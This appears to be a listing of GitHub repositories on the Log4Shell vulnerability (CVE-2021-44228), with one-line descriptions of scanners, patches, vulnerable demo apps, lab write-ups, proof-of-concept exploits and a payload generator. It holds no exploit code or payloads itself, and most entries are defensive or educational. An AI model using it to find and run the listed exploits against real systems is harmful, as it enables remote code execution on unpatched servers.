Vulnerability CVE-2021-44228 allows remote code execution without authentication for several versions of Apache Log4j2 (...
|
demining | 6 | 2 | 2023-01-31 | View |
|
lucab85/ansible-role-log4shell
Ansible playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 for Log4She...
|
lucab85 | 4 | 4 | 2021-12-23 | View |
|
0xsyr0/Log4Shell
This repository contains all gathered resources we used during our Incident Reponse on CVE-2021-44228 and CVE-2021-45046...
|
0xsyr0 | 6 | 1 | 2021-12-13 | View |
|
KeysAU/Get-log4j-Windows.ps1
Identifying all log4j components across all windows servers, entire domain, can be multi domain. CVE-2021-44228
|
KeysAU | 7 | 0 | 2021-12-15 | View |
|
r00thunter/Log4Shell
Generic Scanner for Apache log4j RCE CVE-2021-44228
|
r00thunter | 7 | 0 | 2021-12-22 | View |
|
jacobtread/L4J-Vuln-Patch
This tool patches the CVE-2021-44228 Log4J vulnerability present in all minecraft versions NOTE THIS TOOL MUST BE RE-RUN...
|
jacobtread | 5 | 2 | 2021-12-10 | View |
|
phoswald/sample-ldap-exploit
A short demo of CVE-2021-44228
|
phoswald | 5 | 2 | 2021-12-11 | View |
|
ankur-katiyar/log4j-docker
Docker images and k8s YAMLs for Log4j Vulnerability POC (Log4j (CVE-2021-44228 RCE Vulnerability)
|
ankur-katiyar | 5 | 2 | 2021-12-17 | View |
|
snapattack/damn-vulnerable-log4j-app
Vulnerable web application to test CVE-2021-44228 / log4shell and forensic artifacts from an example attack
|
snapattack | 5 | 2 | 2021-12-20 | View |
|
toramanemre/apache-solr-log4j-CVE-2021-44228
A Nuclei template for Apache Solr affected by Apache Log4J CVE-2021-44228
|
toramanemre | 4 | 3 | 2021-12-14 | View |
|
yesspider-hacker/log4j-payload-generator
log4j-paylaod generator : A generic payload generator for Apache log4j RCE CVE-2021-44228
|
yesspider-hacker | 4 | 3 | 2021-12-27 | View |
|
irgoncalves/f5-waf-quick-patch-cve-2021-44228
This tool creates a custom signature set on F5 WAF and apply to policies in blocking mode
|
irgoncalves | 3 | 4 | 2021-12-13 | View |
|
winnpixie/log4noshell
A Java Agent that disables Apache Log4J's JNDI Lookup to mitigate CVE-2021-44228 ("Log4Shell").
|
winnpixie | 5 | 1 | 2021-12-10 | View |
|
OlafHaalstra/log4jcheck
Check list of URLs against Log4j vulnerability CVE-2021-44228
|
OlafHaalstra | 5 | 1 | 2021-12-12 | View |
|
manuel-alvarez-alvarez/log4j-cve-2021-44228
Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...
|
manuel-alvarez-alvarez | 5 | 1 | 2021-12-13 | View |
|
KeysAU/Get-log4j-Windows-local
Identifying all log4j components across on local windows servers. CVE-2021-44228
|
KeysAU | 5 | 1 | 2021-12-19 | View |
|
nkoneko/VictimApp
Vulnerable to CVE-2021-44228. trustURLCodebase is not required.
|
nkoneko | 4 | 2 | 2021-12-10 | View |
|
corneacristian/Log4J-CVE-2021-44228-RCE
Log4J (CVE-2021-44228) Exploit with Remote Command Execution (RCE)
|
corneacristian | 4 | 2 | 2021-12-12 | View |
|
perryflynn/find-log4j
Find log4j for CVE-2021-44228 on some places * Log4Shell
|
perryflynn | 2 | 4 | 2021-12-13 | View |
|
korteke/log4shell-demo
Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)
|
korteke | 2 | 4 | 2021-12-16 | View |
|
sec13b/CVE-2021-44228-POC
exploit CVE-2021-44228
|
sec13b | 1 | 5 | 2024-03-23 | View |
|
0xRyan/log4j-nullroute
Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes
|
0xRyan | 4 | 1 | 2021-12-13 | View |
|
sud0x00/log4j-CVE-2021-44228
CVE-2021-44228
|
sud0x00 | 5 | 0 | 2021-12-12 | View |
|
mrlnstk/cve-2021-44228-minecraft-poc
Log4J CVE-2021-44228 Minecraft PoC
|
mrlnstk | 5 | 0 | 2021-12-12 | View |
|
suuhm/log4shell4shell
Log4shell - Multi-Toolkit. Find, Fix & Test possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/att...
|
suuhm | 5 | 0 | 2021-12-16 | View |
|
many-fac3d-g0d/apache-tomcat-log4j
Log4j2 CVE-2021-44228 Vulnerability POC in Apache Tomcat
|
many-fac3d-g0d | 5 | 0 | 2021-12-24 | View |
|
ycdxsb/Log4Shell-CVE-2021-44228-ENV
Log4Shell Docker Env
|
ycdxsb | 4 | 1 | 2021-12-13 | View |
|
sinakeshmiri/log4jScan
simple python scanner to check if your network is vulnerable to CVE-2021-44228
|
sinakeshmiri | 4 | 1 | 2021-12-13 | View |
|
Koupah/MC-Log4j-Patcher
A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).
|
Koupah | 4 | 1 | 2021-12-13 | View |
|
inettgmbh/checkmk-log4j-scanner
Scans for Log4j versions effected by CVE-2021-44228
|
inettgmbh | 4 | 1 | 2021-12-15 | View |
|
shamo0/CVE-2021-44228
log4shell (CVE-2021-44228) scanning tool
|
shamo0 | 4 | 1 | 2021-12-16 | View |
|
MrHarshvardhan/PY-Log4j-RCE-Scanner
Using this tool, you can scan for remote command execution vulnerability CVE-2021-44228 on Apache Log4j at multiple addr...
|
MrHarshvardhan | 4 | 1 | 2023-06-29 | View |
|
saharNooby/log4j-vulnerability-patcher-agent
Fixes CVE-2021-44228 in log4j by patching JndiLookup class
|
saharNooby | 3 | 2 | 2021-12-11 | View |
|
madCdan/JndiLookup
Some tools to help mitigating Apache Log4j 2 CVE-2021-44228
|
madCdan | 3 | 2 | 2021-12-13 | View |
|
ubitech/cve-2021-44228-rce-poc
A Remote Code Execution PoC for Log4Shell (CVE-2021-44228)
|
ubitech | 3 | 2 | 2021-12-15 | View |
|
mzlogin/CVE-2021-44228-Demo
Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP
|
mzlogin | 2 | 3 | 2021-12-12 | View |
|
dotPY-hax/log4py
pythonic pure python RCE exploit for CVE-2021-44228 log4shell
|
dotPY-hax | 2 | 3 | 2021-12-12 | View |
|
sourcegraph/log4j-cve-code-search-resources
Using code search to help fix/mitigate log4j CVE-2021-44228
|
sourcegraph | 1 | 4 | 2021-12-13 | View |
|
nu11secur1ty/CVE-2021-44228-VULN-APP
|
nu11secur1ty | 1 | 4 | 2021-12-17 | View |
|
dbzoo/log4j_scanner
Fast filesystem scanner for CVE-2021-44228
|
dbzoo | 4 | 1 | 2021-12-15 | View |
|
TheInterception/Log4J-Simulation-Tool
Vulnerability analysis, patch management and exploitation tool forCVE-2021-44228 / CVE-2021-45046 / CVE-2021-4104
|
TheInterception | 4 | 1 | 2021-12-19 | View |
|
unlimitedsola/log4j2-rce-poc
A bare minimum proof-of-concept for Log4j2 JNDI RCE vulnerability (CVE-2021-44228/Log4Shell).
|
unlimitedsola | 3 | 2 | 2021-12-12 | View |
|
ssl-user-en/Log4j-Scanner-Exploit
Script en bash que permite identificar la vulnerabilidad Log4j CVE-2021-44228 de forma remota.
|
ssl-user-en | 0 | 4 | 2021-12-22 | View |
|
Kadantte/CVE-2021-44228-poc
log4shell sample application (CVE-2021-44228)
|
Kadantte | 0 | 4 | 2021-12-10 | View |
|
M1ngGod/CVE-2021-44228-Log4j-lookup-Rce
|
M1ngGod | 4 | 0 | 2021-12-11 | View |
|
zzzz0317/log4j2-vulnerable-spring-app
CVE-2021-44228
|
zzzz0317 | 4 | 0 | 2021-12-11 | View |
|
Occamsec/log4j-checker
Bash and PowerShell scripts to scan a local filesystem for Log4j .jar files which could be vulnerable to CVE-2021-44228 ...
|
Occamsec | 4 | 0 | 2021-12-13 | View |
|
michaelsanford/Log4Shell-Honeypot
Dockerized honeypot for CVE-2021-44228.
|
michaelsanford | 4 | 0 | 2021-12-15 | View |
|
Kr0ff/CVE-2021-44228
Log4Shell Proof of Concept (CVE-2021-44228)
|
Kr0ff | 4 | 0 | 2021-12-16 | View |
|
vorburger/Log4j_CVE-2021-44228
|
vorburger | 3 | 1 | 2021-12-11 | View |
|
mss/log4shell-hotfix-side-effect
Test case to check if the Log4Shell/CVE-2021-44228 hotfix will raise any unexpected exceptions
|
mss | 3 | 1 | 2021-12-15 | View |
|
pmontesd/log4j-cve-2021-44228
Very simple Ansible playbook that scan filesystem for JAR files vulnerable to Log4Shell
|
pmontesd | 3 | 1 | 2021-12-15 | View |
|
badb33f/Apache-Log4j-POC
Proof of Concept of apache log4j LDAP lookup vulnerability. CVE-2021-44228
|
badb33f | 3 | 1 | 2021-12-22 | View |
|
KirkDJohnson/Wireshark
Downloaded a packet capture (.pcapng) file from malware-traffic-analysis.net which was an example of an attempted attack...
|
KirkDJohnson | 3 | 1 | 2024-03-26 | View |
|
thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832
Log4J CVE-2021-44228 : Mitigation Cheat Sheet
|
thedevappsecguy | 2 | 2 | 2021-12-13 | View |
|
avwolferen/Sitecore.Solr-log4j-mitigation
This repository contains a script that you can run on your (windows) machine to mitigate CVE-2021-44228
|
avwolferen | 2 | 2 | 2021-12-13 | View |
|
VerveIndustrialProtection/CVE-2021-44228-Log4j
|
VerveIndustrialProtection | 1 | 3 | 2021-12-15 | View |
|
codiobert/log4j-scanner
Check CVE-2021-44228 vulnerability
|
codiobert | 3 | 1 | 2021-12-14 | View |
|
hotpotcookie/CVE-2021-44228-white-box
Log4j vulner testing environment based on CVE-2021-44228. It provide guidance to build the sample infrastructure and the...
|
hotpotcookie | 3 | 1 | 2022-02-12 | View |
|
b-abderrahmane/CVE-2021-44228-playground
|
b-abderrahmane | 2 | 2 | 2021-12-11 | View |
|
mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform
A Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228
|
mkhazamipour | 2 | 2 | 2021-12-11 | View |
|
george-petrakis/log4j-scanner-CVE-2021-44228
Simple tool for scanning entire directories for attempts of CVE-2021-44228
|
george-petrakis | 2 | 1 | 2021-12-13 | View |
|
C00LN3T/Log4ShellAuditor
An autonomous reflective Go agent for full-cycle security auditing, WAF evasion, OOB LDAP verification, self-remediation...
|
C00LN3T | 3 | 0 | 2026-05-31 | View |
|
kannthu/CVE-2021-44228-Apache-Log4j-Rce
|
kannthu | 0 | 3 | 2021-12-16 | View |
|
kek-Sec/log4j-scanner-CVE-2021-44228
Simple tool for scanning entire directories for attempts of CVE-2021-44228
|
kek-Sec | 2 | 1 | 2021-12-13 | View |
|
zlepper/CVE-2021-44228-Test-Server
A small server for verifing if a given java program is succeptibel to CVE-2021-44228
|
zlepper | 3 | 0 | 2021-12-10 | View |
|
threatmonit/Log4j-IOCs
Public IOCs about log4j CVE-2021-44228
|
threatmonit | 3 | 0 | 2021-12-13 | View |
|
Joefreedy/Log4j-Windows-Scanner
CVE-2021-44228 vulnerability in Apache Log4j library | Log4j vulnerability scanner on Windows machines.
|
Joefreedy | 3 | 0 | 2021-12-16 | View |
|
Sma-Das/Log4j-PoC
An educational Proof of Concept for the Log4j Vulnerability (CVE-2021-44228) in Minecraft
|
Sma-Das | 3 | 0 | 2023-03-14 | View |
|
tadash10/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment
Objective: Demonstrate the exploitation of the Log4Shell vulnerability (CVE-2021-44228) within a simulated banking appli...
|
tadash10 | 3 | 0 | 2024-06-09 | View |
|
1in9e/Apache-Log4j2-RCE
Apache Log4j2 RCE( CVE-2021-44228)验证环境
|
1in9e | 2 | 1 | 2021-12-10 | View |
|
byteboycn/CVE-2021-44228-Apache-Log4j-Rce
|
byteboycn | 2 | 1 | 2021-12-11 | View |
|
tasooshi/horrors-log4shell
A micro lab for CVE-2021-44228 (log4j)
|
tasooshi | 2 | 1 | 2021-12-12 | View |
|
anuvindhs/how-to-check-patch-secure-log4j-CVE-2021-44228
A one-stop repo/ information hub for all log4j vulnerability-related information.
|
anuvindhs | 2 | 1 | 2021-12-15 | View |
|
chandru-gunasekaran/log4j-fix-CVE-2021-44228
Windows Batch Scrip to Fix the log4j-issue-CVE-2021-44228
|
chandru-gunasekaran | 2 | 1 | 2021-12-20 | View |
|
BabooPan/Log4Shell-CVE-2021-44228-Demo
Log4Shell Demo with AWS
|
BabooPan | 2 | 1 | 2021-12-22 | View |
|
Vulnmachines/log4jshell_CVE-2021-44228
Log4jshell - CVE-2021-44228
|
Vulnmachines | 2 | 1 | 2022-01-07 | View |
|
lathika-3006/Solar-exploiting-log-4j
This repository presents a comprehensive walkthrough of the Solar Exploiting Log4j room on TryHackMe, with a focus on un...
|
lathika-3006 | 2 | 1 | 2026-03-22 | View |
|
guardicode/CVE-2021-44228_IoCs
Known IoCs for log4j framework vulnerability
|
guardicode | 0 | 3 | 2021-12-12 | View |
|
alexandreroman/cve-2021-44228-workaround-buildpack
Buildpack providing a workaround for CVE-2021-44228 (Log4j RCE exploit)
|
alexandreroman | 3 | 0 | 2021-12-10 | View |
|
Contrast-Security-OSS/CVE-2021-44228
Professional Service scripts to aid in the identification of affected Java applications in TeamServer
|
Contrast-Security-OSS | 0 | 2 | 2021-12-13 | View |
|
helsecert/CVE-2021-44228
|
helsecert | 1 | 1 | 2021-12-13 | View |
|
aajuvonen/log4stdin
A Java application intentionally vulnerable to CVE-2021-44228
|
aajuvonen | 0 | 2 | 2022-01-16 | View |
|
eurogig/jankybank
Simple Java Front and Back end with bad log4j version featuring CVE-2021-44228
|
eurogig | 0 | 2 | 2022-08-25 | View |
|
binganao/Log4j2-RCE
Log4j2 CVE-2021-44228 复现和回显利用
|
binganao | 2 | 0 | 2021-12-11 | View |
|
jeffbryner/log4j-docker-vaccine
docker compose solution to run a vaccine environment for the log4j2 vulnerability CVE-2021-44228
|
jeffbryner | 2 | 0 | 2021-12-11 | View |
|
ph0lk3r/anti-jndi
Fun things against the abuse of the recent CVE-2021-44228 (Log4Shell) vulnerability using common web servers.
|
ph0lk3r | 2 | 0 | 2021-12-13 | View |
|
jeffli1024/log4j-rce-test
CVE-2021-44228 - Apache log4j RCE quick test
|
jeffli1024 | 2 | 0 | 2021-12-13 | View |
|
taurusxin/CVE-2021-44228
|
taurusxin | 2 | 0 | 2021-12-13 | View |
|
alpacamybags118/log4j-cve-2021-44228-sample
Sample docker-compose setup to show how this exploit works
|
alpacamybags118 | 2 | 0 | 2021-12-14 | View |
|
VinniMarcon/Log4j-Updater
Log4J Updater Bash Script to automate the framework update process on numerous machines and prevent the CVE-2021-44228
|
VinniMarcon | 2 | 0 | 2021-12-15 | View |
|
alenazi90/log4j
An automated header extensive scanner for detecting log4j RCE CVE-2021-44228
|
alenazi90 | 2 | 0 | 2021-12-15 | View |
|
Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228
Script - Workaround instructions to address CVE-2021-44228 in vCenter Server
|
Fazmin | 2 | 0 | 2021-12-17 | View |
|
spasam/log4j2-exploit
log4j2 Log4Shell CVE-2021-44228 proof of concept
|
spasam | 2 | 0 | 2021-12-20 | View |
|
julian911015/Log4j-Scanner-Exploit
Script en bash que permite identificar la vulnerabilidad Log4j CVE-2021-44228 de forma remota.
|
julian911015 | 2 | 0 | 2021-12-20 | View |
|
dcm2406/CVE-Lab
Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604
|
dcm2406 | 2 | 0 | 2023-12-07 | View |
|
lhotari/pulsar-docker-images-patch-CVE-2021-44228
Patch Pulsar Docker images with Log4J 2.17.1 update to mitigate Apache Log4J Security Vulnerabilities including Log4Shel...
|
lhotari | 1 | 1 | 2021-12-10 | View |
|
cado-security/log4shell
Content to help the community responding to the Log4j Vulnerability Log4Shell CVE-2021-44228
|
cado-security | 1 | 1 | 2021-12-11 | View |
|
halibobor/log4j2
CVE-2021-44228
|
halibobor | 1 | 1 | 2021-12-13 | View |
|
gcmurphy/chk_log4j
Some siimple checks to see if JAR file is vulnerable to CVE-2021-44228
|
gcmurphy | 1 | 1 | 2021-12-14 | View |
|
guerzon/log4shellpoc
Simple Spring Boot application vulnerable to CVE-2021-44228 (a.k.a log4shell)
|
guerzon | 1 | 1 | 2021-12-14 | View |
|
Aschen/log4j-patched
Provide patched version of Log4J against CVE-2021-44228 and CVE-2021-45046 as well as a script to manually patch it your...
|
Aschen | 1 | 1 | 2021-12-17 | View |
|
trickyearlobe/inspec-log4j
An Inspec profile to check for Log4j CVE-2021-44228 and CVE-2021-45046
|
trickyearlobe | 1 | 1 | 2021-12-19 | View |
|
srcporter/CVE-2021-44228
DO NOT USE FOR ANYTHING REAL. Simple springboot sample app with vulnerability CVE-2021-44228 aka "Log4Shell"
|
srcporter | 1 | 1 | 2022-11-08 | View |
|
demonrvm/Log4ShellRemediation
A vulnerable Spring Boot application that uses log4j and is vulnerable to CVE-2021-44228, CVE-2021-44832, CVE-2021-45046...
|
demonrvm | 1 | 1 | 2023-04-02 | View |
|
kossatzd/log4j-CVE-2021-44228-test
demo project to highlight how to execute the log4j (CVE-2021-44228) vulnerability
|
kossatzd | 0 | 2 | 2021-12-13 | View |
|
chilit-nl/log4shell-example
The goal of this project is to demonstrate the log4j cve-2021-44228 exploit vulnerability in a spring-boot setup, and to...
|
chilit-nl | 0 | 2 | 2021-12-13 | View |
|
dark-ninja10/Log4j-CVE-2021-44228
On Thursday (December 9th), a 0-day exploit in the popular Java logging library log4j (version 2) was discovered that re...
|
dark-ninja10 | 0 | 2 | 2021-12-14 | View |
|
34zY/JNDI-Exploit-1.2-log4shell
Details : CVE-2021-44228
|
34zY | 0 | 2 | 2021-12-14 | View |
|
horrister/log4shell-cve-2021-44228
|
horrister | 1 | 0 | 2026-06-04 | View |
|
MeterianHQ/log4j-vuln-coverage-check
A simple project to check coverage of Log4J vuln CVE-2021-44228 (and related)
|
MeterianHQ | 0 | 1 | 2021-12-15 | View |
|
Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE
PoC RCE Log4j CVE-2021-4428 para pruebas
|
Grupo-Kapa-7 | 0 | 1 | 2021-12-17 | View |
|
axelcurmi/log4shell-docker-lab
Log4Shell (CVE-2021-44228) docker lab
|
axelcurmi | 0 | 1 | 2021-12-18 | View |
|
recanavar/vuln_spring_log4j2
Simple Vulnerable Spring Boot Application to Test the CVE-2021-44228
|
recanavar | 0 | 1 | 2021-12-16 | View |
|
wajda/log4shell-test-exploit
Test exploit of CVE-2021-44228
|
wajda | 0 | 1 | 2021-12-17 | View |
|
dmitsuo/log4shell-war-fixer
Shell script to remove JndiLookup class from Log4J 2 jar file, inside WAR file, in order to mitigate CVE-2021-44228, a.k...
|
dmitsuo | 1 | 0 | 2021-12-20 | View |
|
LucasPDiniz/CVE-2021-44228
Log4j Vulnerability RCE - CVE-2021-44228
|
LucasPDiniz | 0 | 1 | 2023-11-13 | View |
|
felixslama/log4shell-minecraft-demo
Log4Shell (CVE-2021-44228) minecraft demo. Used for education fairs
|
felixslama | 0 | 1 | 2023-11-21 | View |
|
Super-Binary/cve-2021-44228
这是安徽大学 “漏洞分析实验”(大三秋冬)期中作业归档。完整文档位于https://testgames.me/2024/11/10/cve-2021-44228/
|
Super-Binary | 0 | 1 | 2024-11-15 | View |
|
moften/Log4Shell
Log4Shell CVE-2021-44228 PoC
|
moften | 0 | 1 | 2025-09-09 | View |
|
manishkanyal/log4j-scanner
A Log4j vulnerability scanner is used to identify the CVE-2021-44228 and CVE_2021_45046
|
manishkanyal | 1 | 0 | 2022-04-17 | View |
|
sebiboga/jmeter-fix-cve-2021-44228-windows
fix cve 44228 for windows
|
sebiboga | 0 | 1 | 2021-12-15 | View |
|
uint0/cve-2021-44228--spring-hibernate
CVE-2021-44228 POC - Spring / Hibernate
|
uint0 | 1 | 0 | 2021-12-11 | View |
|
chilliwebs/CVE-2021-44228_Example
|
chilliwebs | 1 | 0 | 2021-12-11 | View |
|
DiCanio/CVE-2021-44228-docker-example
|
DiCanio | 1 | 0 | 2021-12-12 | View |
|
RrUZi/Awesome-CVE-2021-44228
An awesome curated list of repos for CVE-2021-44228. ``Apache Log4j 2``
|
RrUZi | 1 | 0 | 2021-12-12 | View |
|
kali-dass/CVE-2021-44228-log4Shell
Sample log4j shell exploit
|
kali-dass | 1 | 0 | 2021-12-12 | View |
|
pravin-pp/log4j2-CVE-2021-44228
|
pravin-pp | 1 | 0 | 2021-12-12 | View |
|
Panyaprach/Prove-CVE-2021-44228
|
Panyaprach | 1 | 0 | 2021-12-12 | View |
|
kimobu/cve-2021-44228
Some files for red team/blue team investigations into CVE-2021-44228
|
kimobu | 1 | 0 | 2021-12-13 | View |
|
JiuBanSec/Log4j-CVE-2021-44228
Log4j Remote Code Injection (Apache Log4j 2.x < 2.15.0-rc2)
|
JiuBanSec | 1 | 0 | 2021-12-13 | View |
|
p3dr16k/log4j-1.2.15-mod
log4j version 1 with a patch for CVE-2021-44228 vulnerability
|
p3dr16k | 1 | 0 | 2021-12-13 | View |
|
Woahd/log4j-urlscanner
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithr...
|
Woahd | 1 | 0 | 2021-12-14 | View |
|
rgl/log4j-log4shell-playground
A playground for poking at the Log4Shell (CVE-2021-44228) vulnerability mitigations
|
rgl | 1 | 0 | 2021-12-15 | View |
|
dpomnean/log4j_scanner_wrapper
log4j vulnerability wrapper scanner for CVE-2021-44228
|
dpomnean | 1 | 0 | 2021-12-16 | View |
|
andalik/log4j-filescan
Scanner recursivo de arquivos desenvolvido em Python 3 para localização e varredura de versões vulneráveis do Log4j2, co...
|
andalik | 1 | 0 | 2021-12-16 | View |
|
gyaansastra/CVE-2021-44228
Log4Shell CVE-2021-44228 Vulnerability Scanner and POC
|
gyaansastra | 1 | 0 | 2021-12-16 | View |
|
kal1gh0st/MyLog4Shell
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs with multith...
|
kal1gh0st | 1 | 0 | 2021-12-16 | View |
|
Apipia/log4j-pcap-activity
A fun activity using a packet capture file from the log4j exploit (CVE-2021-44228)
|
Apipia | 1 | 0 | 2021-12-18 | View |
|
Rk-000/Log4j_scan_Advance
A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228
|
Rk-000 | 1 | 0 | 2021-12-19 | View |
|
mn-io/log4j-spring-vuln-poc
POC for CVE-2021-44228 within Springboot
|
mn-io | 1 | 0 | 2021-12-21 | View |
|
MarceloLeite2604/log4j-vulnerability
Presents how to exploit CVE-2021-44228 vulnerability.
|
MarceloLeite2604 | 1 | 0 | 2021-12-30 | View |
|
TPower2112/Writing-Sample-1
CVE-2021-44228 Log4j Summary
|
TPower2112 | 1 | 0 | 2022-04-30 | View |
|
moshuum/tf-log4j-aws-poc
This project files demostrate a proof-of-concept of log4j vulnerability (CVE-2021-44228) on AWS using Terraform Infrastr...
|
moshuum | 1 | 0 | 2022-06-07 | View |
|
jaehnri/CVE-2021-44228
Proof of concept of the Log4Shell vulnerability (CVE-2021-44228)
|
jaehnri | 1 | 0 | 2022-06-08 | View |
|
bcdunbar/CVE-2021-44228-poc
CVE-2021-44228 POC / Example
|
bcdunbar | 1 | 0 | 2022-09-21 | View |
|
pierpaolosestito-dev/Log4Shell-CVE-2021-44228-PoC
CVE 2021-44228 Proof-of-Concept. Log4Shell is an attack against Servers that uses vulnerable versions of Log4J.
|
pierpaolosestito-dev | 1 | 0 | 2023-02-08 | View |
|
Hoanle396/CVE-2021-44228-demo
|
Hoanle396 | 1 | 0 | 2024-05-28 | View |
|
Carlos-Mesquita/TPASLog4ShellPoC
Proof of Concept for the Log4Shell vulnerability (CVE-2021-44228), developed as part of the coursework for the curricula...
|
Carlos-Mesquita | 1 | 0 | 2024-10-08 | View |
|
qw3rtyou/CVE-2021-44228_dockernize
|
qw3rtyou | 1 | 0 | 2025-02-04 | View |
|
danieljosmariyan7254/TryHackMe-Solar-exploiting-log4j-
Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun.
|
danieljosmariyan7254 | 1 | 0 | 2026-03-26 | View |
|
leetxyz/CVE-2021-44228-Advisories
List of company advisories log4j
|
leetxyz | 0 | 1 | 2021-12-11 | View |
|
WYSIIWYG/Log4J_0day_RCE
Log4j-RCE (CVE-2021-44228) Proof of Concept
|
WYSIIWYG | 0 | 1 | 2021-12-11 | View |
|
tuyenee/Log4shell
A lab for playing around with the Log4J CVE-2021-44228
|
tuyenee | 0 | 1 | 2021-12-13 | View |
|
izzyacademy/log4shell-mitigation
Mitigation for Log4Shell Security Vulnerability CVE-2021-44228
|
izzyacademy | 0 | 1 | 2021-12-10 | View |
|
sandarenu/log4j2-issue-check
Demo project to evaluate Log4j2 Vulnerability | CVE-2021-44228
|
sandarenu | 0 | 1 | 2021-12-14 | View |
|
DAADAISMYLIFE/log4shell-lab
Log4Shell (CVE-2021-44228) 보안 실습 환경 - Log4j 2.14.1 취약 로그 수집 서버
|
DAADAISMYLIFE | 0 | 0 | 2026-06-17 | View |
|
limxuan/ehir-vuln-enterprise-login
webapp vulnerable to CVE-2021-44228
|
limxuan | 0 | 0 | 2026-06-15 | View |
|
sqsec/log4j2_CVE-2021-44228
|
sqsec | 0 | 0 | 2022-12-30 | View |
|
hmxh123/Log4Shell-Vulnerability-Replication
CVE-2021-44228 漏洞复现完整记录(含环境搭建、触发验证)
|
hmxh123 | 0 | 0 | 2026-06-09 | View |
|
vutiendat323/CVE-2021-44228_Log4Shell
|
vutiendat323 | 0 | 0 | 2026-05-12 | View |
|
bhimsekhar/vulnerable-java-app
Spring Boot app with log4j 2.14.1 (CVE-2021-44228) — VulnFix agent test target
|
bhimsekhar | 0 | 0 | 2026-06-03 | View |
|
jomjosh17/Log4Shell-CVE-2021-44228-
|
jomjosh17 | 0 | 0 | 2026-05-30 | View |
|
zoubir-sahnoun/log4shell-poc-maven
Intentionally vulnerable Maven project — CVE-2021-44228 (Log4Shell) SCA demo target
|
zoubir-sahnoun | 0 | 0 | 2026-05-26 | View |
|
felisha-elmer/Sandbox-Challenge-Log4Shell-CVE-2021-44228-
|
felisha-elmer | 0 | 0 | 2026-05-23 | View |
|
MAFO-sec/mi-laboratorio-log4shell
Laboratorio automatizado Plug & Play en Docker para auditar y estudiar la vulnerabilidad Log4Shell (CVE-2021-44228)
|
MAFO-sec | 0 | 0 | 2026-05-18 | View |
|
aaronm-sysdig/log4j-vuln-demo
Intentionally vulnerable Log4j 2.14.1 demo for Sysdig CNAPP scanning (CVE-2021-44228)
|
aaronm-sysdig | 0 | 0 | 2026-05-16 | View |
|
vutiendat323/log4Shell-CVE-2021-44228
|
vutiendat323 | 0 | 0 | 2026-05-12 | View |
|
FacundoMfernandez/pentesting-obioba
Pentesting caja negra: Shellshock (CVE-2014-6271) + Log4Shell (CVE-2021-44228). Escalada a root. Informe ejecutivo y téc...
|
FacundoMfernandez | 0 | 0 | 2026-05-05 | View |
|
neilc1964techned/craready-test-java-vulns
CRAReady SBOM test fixture — Java/Maven app with Log4Shell (CVE-2021-44228), Spring4Shell, Text4Shell, and other critica...
|
neilc1964techned | 0 | 0 | 2026-05-02 | View |
|
sajanapamuditha/Cyber-Attack-Simulation-
Log4Shell (CVE-2021-44228)
|
sajanapamuditha | 0 | 0 | 2026-05-02 | View |
|
tieupham267/log4shell-coraza
Log4Shell (CVE-2021-44228) defense lab — nginx + Coraza WAF dynamic module + OWASP CRS v4. Educational use only.
|
tieupham267 | 0 | 0 | 2026-04-28 | View |
|
kaleth4/CVE-2021-44228
|
kaleth4 | 0 | 0 | 2026-04-27 | View |
|
pinaraltinok/Log4Shell-Attack
Multi-Stage Attack Modeling and Detection of Log4Shell for CVE-2021-44228
|
pinaraltinok | 0 | 0 | 2026-04-22 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
davindersingh74569-lang/HTB-Unified-Writeup
A technical walkthrough of exploiting CVE-2021-44228 (Log4Shell) in a UniFi Network Application environment, including M...
|
davindersingh74569-lang | 0 | 0 | 2026-04-19 | View |
|
jdormannn/SecureOps-Lab
Performed a live cybersecurity assessment on a university Linux server. During analysis, active attack activity was iden...
|
jdormannn | 0 | 0 | 2026-04-09 | View |
|
joaovicdev/EXPLOIT-CVE-2021-44228
PoC of CVE-2021-44228
|
joaovicdev | 0 | 0 | 2026-04-10 | View |
|
nikolas-charalambidis/cve-2021-44228
A simple simulation of the infamous CVE-2021-44228 issue.
|
nikolas-charalambidis | 0 | 0 | 2021-12-17 | View |
|
municipalparkingservices/CVE-2021-44228-Scanner
|
municipalparkingservices | 0 | 0 | 2021-12-14 | View |
|
0xThiebaut/CVE-2021-44228
CVE-2021-44228 Response Scripts
|
0xThiebaut | 0 | 0 | 2021-12-14 | View |
|
bhprin/log4j-vul
This project is just to show Apache Log4j2 Vulnerability - aka CVE-2021-44228
|
bhprin | 0 | 0 | 2021-12-15 | View |
|
avirahul007/CVE-2021-44228
|
avirahul007 | 0 | 0 | 2021-12-15 | View |
|
jyotisahu98/logpresso-CVE-2021-44228-Scanner
Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228
|
jyotisahu98 | 0 | 0 | 2021-12-15 | View |
|
honeynet/log4shell-data
Data we are receiving from our honeypots about CVE-2021-44228
|
honeynet | 0 | 0 | 2021-12-15 | View |
|
b1tm0n3r/CVE-2021-44228
CVE-2021-44228 demo webapp
|
b1tm0n3r | 0 | 0 | 2021-12-15 | View |
|
lonecloud/CVE-2021-44228-Apache-Log4j
CVE-2021-44228-Apache-Log4j
|
lonecloud | 0 | 0 | 2021-12-16 | View |
|
axisops/CVE-2021-44228
log4j mitigation work
|
axisops | 0 | 0 | 2021-12-16 | View |
|
hozyx/log4shell
Applications that are vulnerable to the log4j CVE-2021-44228/45046 issue may be detectable by scanning jar, war, ear, zi...
|
